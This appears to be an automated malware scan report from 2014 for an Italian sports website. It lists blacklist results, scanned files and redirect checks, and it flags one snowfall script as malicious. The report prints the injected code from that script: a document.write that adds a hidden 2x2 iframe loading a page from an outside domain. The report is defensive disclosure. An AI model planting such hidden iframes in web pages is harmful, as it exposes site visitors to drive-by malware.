Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=fimcosport.it
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://fimcosport.it/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://fimcosport.it/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 22 Dec 2014 12:26:24 GMT Location: http://www.fimcosport.it/ Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.fimcosport.it/ | 200 OK Content-Length: 26050 Content-Type: text/html | clean |
http://www.fimcosport.it/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/javascript | clean |
http://fimcosport.it/modules/mod_snowfalling/mod_snowfalling.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 22 Dec 2014 12:26:26 GMT Location: http://www.fimcosport.it/modules/mod_snowfalling/mod_snowfalling.js Server: Apache Content-Length: 275 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.fimcosport.it/modules/mod_snowfalling/mod_snowfalling.js | 200 OK Content-Length: 15014 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thejunglegroup-website.co.uk/akpm.html?j=1501017></iframe>');
function SnowStorm(imagePath, flakeWidth, flakeHeight, flakesMax, flakesMaxActive, vMaxX, vMaxY, flakeBottom, snowStick, snowCollect, followMouse, onlyVerticalFall, swayingFlake, swayingOffsetMin, swayingOffsetMax, stakingOrder, usePNG, flakeTypes) { var targetElement = null; var zI s.init(); s.active = true; } } if (document.addEventListener) { document.addEventListener('DOMContentLoaded',function(){s.start(true)},false); window.addEventListener('load',function(){s.start(true)},false); } else { addEvent(window,'load',function(){s.start(true)}); } } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://thejunglegroup-website.co.uk/akpm.html?j=1501017 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thejunglegroup-website.co.uk/akpm.html?j=1501017> | ||
http://www.fimcosport.it/templates/gk_corporate/lib/scripts/gk_image_show.js | 200 OK Content-Length: 7095 Content-Type: application/javascript | clean |
http://fimcosport.it/templates/gk_corporate/lib/scripts/template_scripts.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 22 Dec 2014 12:26:27 GMT Location: http://www.fimcosport.it/templates/gk_corporate/lib/scripts/template_scripts.js Server: Apache Content-Length: 287 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.fimcosport.it/templates/gk_corporate/lib/scripts/template_scripts.js | 200 OK Content-Length: 3788 Content-Type: application/javascript | clean |
http://fimcosport.it/templates/gk_corporate/lib/scripts/menu.php?width=1&height=1&opacity=1&animation=1&speed=180 | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 22 Dec 2014 12:26:27 GMT Location: http://www.fimcosport.it/templates/gk_corporate/lib/scripts/menu.php?width=1&height=1&opacity=1&animation=1&speed=180 Server: Apache Content-Length: 341 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.fimcosport.it/templates/gk_corporate/lib/scripts/menu.php?width=1&height=1&opacity=1&animation=1&speed=180 | 200 OK Content-Length: 3391 Content-Type: text/javascript | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 19470 Content-Type: text/javascript | clean |
http://fimcosport.it/./ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 22 Dec 2014 12:26:28 GMT Location: http://www.fimcosport.it/ Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.fimcosport.it/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://fimcosport.it/index.php?option=com_comprofiler&task=registers | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 22 Dec 2014 12:26:28 GMT Location: http://www.fimcosport.it/index.php?option=com_comprofiler&task=registers Server: Apache Content-Length: 284 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.fimcosport.it/index.php?option=com_comprofiler&task=registers | 200 OK Content-Length: 46037 Content-Type: text/html | clean |
http://www.fimcosport.it/components/com_comprofiler/js/curvycorners.min.js?v=86f692ef05484bef | 200 OK Content-Length: 32607 Content-Type: application/javascript | clean |
http://www.fimcosport.it/components/com_comprofiler/js/cb12.min.js?v=2d02b79be7ed82a9 | 200 OK Content-Length: 7909 Content-Type: application/javascript | clean |
http://www.fimcosport.it/components/com_comprofiler/js/overlib_all_mini.js?v=4682a467a72b964b | 200 OK Content-Length: 48035 Content-Type: application/javascript | clean |
http://www.fimcosport.it/components/com_comprofiler/js/jquery-1.5.2/jquery-1.5.2.min.js?v=42fa57838ccf3eba | 200 OK Content-Length: 85923 Content-Type: application/javascript | clean |
http://www.fimcosport.it/components/com_comprofiler/js/jquery-1.5.2/jquery.metadata.min.js?v=9758879755ee8a06 | 200 OK Content-Length: 3996 Content-Type: application/javascript | clean |
http://www.fimcosport.it/components/com_comprofiler/js/jquery-1.5.2/jquery.validate.min.js?v=7d582be6fdcc4e04 | 200 OK Content-Length: 20913 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: fimcosport.it
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 22 Dec 2014 12:26:24 GMT
Location: http://www.fimcosport.it/
Server: Apache
Content-Length: 233
Content-Type: text/html; charset=iso-8859-1
...233 bytes of data.
GET / HTTP/1.1
Host: fimcosport.it
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 22 Dec 2014 12:26:24 GMT
Location: http://www.fimcosport.it/
Server: Apache
Content-Length: 233
Content-Type: text/html; charset=iso-8859-1
...233 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: fimcosport.it
Referer: http://www.google.com/search?q=fimcosport.it
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: fimcosport.it
Referer: http://www.google.com/search?q=fimcosport.it
Result:
The result is similar to the first query. There are no suspicious redirects found.